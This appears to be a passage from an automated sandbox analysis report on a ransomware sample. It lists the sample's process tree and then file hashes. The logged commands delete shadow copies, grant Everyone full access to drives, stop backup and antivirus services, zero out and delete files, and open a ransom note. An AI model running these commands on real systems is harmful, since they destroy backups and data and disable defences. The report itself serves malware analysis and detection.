C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$SQL_2008 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Symantec System Recovery” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Symantec System Recovery” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Message Router” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Message Router” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop unistoresvc_1af40a /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop unistoresvc_1af40a /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$BKUPEXEC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos MCS Client” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Client” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msexchangeimap4 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msexchangeimap4 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$TPSAMA /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos MCS Agent” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Agent” /y3⤵
-
-
-
C:\Windows\SysWOW64\arp.exe"arp" -a2⤵
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.7.0.382⤵
-
-
C:\Windows\SysWOW64\notepad.exe"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt2⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe2⤵
- Deletes itself
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 33⤵
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "18289807151352858742-8324101557131368271433414331-416343301-2040673960-1830363609"1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "4987969421277729446-131917685114230090741657916113-1095825130-273387517-1688641721"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1263006152-200403934310770645631357485370-1870562662-3855626721957895606446512797"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1338478048692204442-589499493566985381-845025998-9131827451549502903-627286570"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1771760948953957088275630135-20624908981928044529-1308073370-585933630-599600691"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1886127353499475549572316306121177654185809868870439430294527925357311721"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "18257167871241801297-32906372-105772277917118546491039784861-345219586-1956506290"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-379188099378699571206186534468918915810265301541902289-883591463-1282819902"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "186174329590834194119852874251295677114-5764970512694579921977930304-647278707"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2031626407-15224929751530651702-17488481001097973722145922236911265563721729200157"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "75010337-184488126149658656-1274287765-165737540-5783656064728533401955655838"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "201226650-1464482533821524010-15127183941439571308-18128944671842332923-1036207546"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "311603653-452075682657738890-755843958243976258-174273659715175164341615731902"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "430401666-525313962-2007446770-1428883817-1019015845572154009-1657250135-248827161"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-991384099-346732710-1869797485-1956480402-1043964505-25361437-1731863603-749305513"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1306305161-112975228-11470914441064901489158293846918400240681343741505-2056049243"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1470868858648310129-737800280-121314866793104301721188721121850992254-1567865115"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "712065816-1407011930110088915861711290-837355539-744483578-12595142252084066721"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2112686704-15772515021845780559-3919887045520108881162705411128788738597013131"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "504299217-7888132293365391441867478779-1917245976056759182092257589-1714512138"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-711583106187059296115986778291464993101149173128-2146192296593226486391833256"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "16313980881564576470-1743115518458247823-17076463241058878567-13949308291096973043"1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
d89968acfbd0cd60b51df04860d99896
SHA1b3c29916ccb81ce98f95bbf3aa8a73de16298b29
SHA2561020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
SHA512b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842
-
MD5
df44874327d79bd75e4264cb8dc01811
SHA11396b06debed65ea93c24998d244edebd3c0209d
SHA25655de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181
SHA51295dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3
-
MD5
be4d72095faf84233ac17b94744f7084
SHA1cc78ce5b9c57573bd214a8f423ee622b00ebb1ec
SHA256b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc
SHA51243856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097
-
MD5
a725bb9fafcf91f3c6b7861a2bde6db2
SHA18bb5b83f3cc37ff1e5ea4f02acae38e72364c114
SHA25651651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431
SHA5121c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e
-
MD5
7f79b990cb5ed648f9e583fe35527aa7
SHA171b177b48c8bd745ef02c2affad79ca222da7c33
SHA256080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683
SHA51220926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda
-
MD5
02ff38ac870de39782aeee04d7b48231
SHA10390d39fa216c9b0ecdb38238304e518fb2b5095
SHA256fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876
SHA51224a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341
-
MD5
b6d38f250ccc9003dd70efd3b778117f
SHA1d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a
SHA2564de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265
SHA51267d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9
-
MD5
597009ea0430a463753e0f5b1d1a249e
SHA14e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62
SHA2563fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d
SHA5125d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d
-
MD5
354b8209f647a42e2ce36d8cf326cc92
SHA198c3117f797df69935f8b09fc9e95accfe3d8346
SHA256feae405d288fdd38438f9d9b54f791f3ce3805f1bb88780da5aca402ad372239
SHA512420be869b58e9a7a2c31f2550ac269df832935692a6431d455a10d9b426781e79d91e30ace2c465633b8a7ff2be1bf49734d8b99a390090dc4b36411d4391ff0
-
MD5
75a8da7754349b38d64c87c938545b1b
SHA15c28c257d51f1c1587e29164cc03ea880c21b417
SHA256bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96
SHA512798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643
-
MD5
5e3c7184a75d42dda1a83606a45001d8
SHA194ca15637721d88f30eb4b6220b805c5be0360ed
SHA2568278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59
SHA512fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b
-
MD5
a70ee38af4bb2b5ed3eeb7cbd1a12fa3
SHA181dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9
SHA256dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d
SHA5128c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3
-
MD5
1346b9e0bea968827fc06101d79d01c6
SHA179e3ae1d1e1c4ba9f9776e455c5a487801357408
SHA25673a158058d0c044ddef6652d52e673fb9651581c6988d34e001ae845bb750fc0
SHA512cb81c839a0da75ba7d19c2aacba6e1d734a677cbad865fb81b988d85198799b6ccfef6dce0663c902e95b80a3897c611189edcf615209e6a4289031cc7d4e31e
-
MD5
0b4cc435de325190d35b3d138df40057
SHA19c13582e457f9fb855bd16f4bf468e8eda367051
SHA2566a8f4daad9b70a16eac85101a82a60d1256af1c79d8cb3557b2cbd58fcf24249
SHA51223e329990dcf17907d1b4288729fdd8775feccdf7513e39f957b8add2f29205b68b0c92a68f920a53ce10d0e30e5daa055d3ef6e1f2663dde5202c9fb8154a41
-
MD5
09d0d1116d2461517b8297e6f47c5aef
SHA1499e2d4dffe2b9609ce8d4a60413413ac7903b0b
SHA256efdb64258e858229059d21a05367a6136f9cbba949414577a06f24a23a01e0c5
SHA5126401510ed3fd1f1a56fd76cc08fa90890064ddfdf8e60ca4c8589dca990c76e0308e4c7fd2c641567563ae2d74659402a4178ffdb089ba28db51b5e5584405c3
-
MD5
09d0d1116d2461517b8297e6f47c5aef
SHA1499e2d4dffe2b9609ce8d4a60413413ac7903b0b
SHA256efdb64258e858229059d21a05367a6136f9cbba949414577a06f24a23a01e0c5
SHA5126401510ed3fd1f1a56fd76cc08fa90890064ddfdf8e60ca4c8589dca990c76e0308e4c7fd2c641567563ae2d74659402a4178ffdb089ba28db51b5e5584405c3
-
MD5
55a169a80dd852f9218b1cfa9bbb1672
SHA1bcf90572d84f2d96bed5cff78a30aeb10d39c04f
SHA2565f948f0c50ea89e92d4668697919054d89bda616acb45ecbbf0a93cc5c786028
SHA51272fd9974cac439fadab89b8b1bea8494f0a9e30bad0ee5d069bef07e83d0d0ab44896312e155200908c82a99f053cdd3872802b38d2d0ad5bbc1ae298833f5b6
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
-
-
-
-
-
-
Filesize
4KB
-
Filesize
4KB
-
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Filesize
4KB
-
Filesize
4KB
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB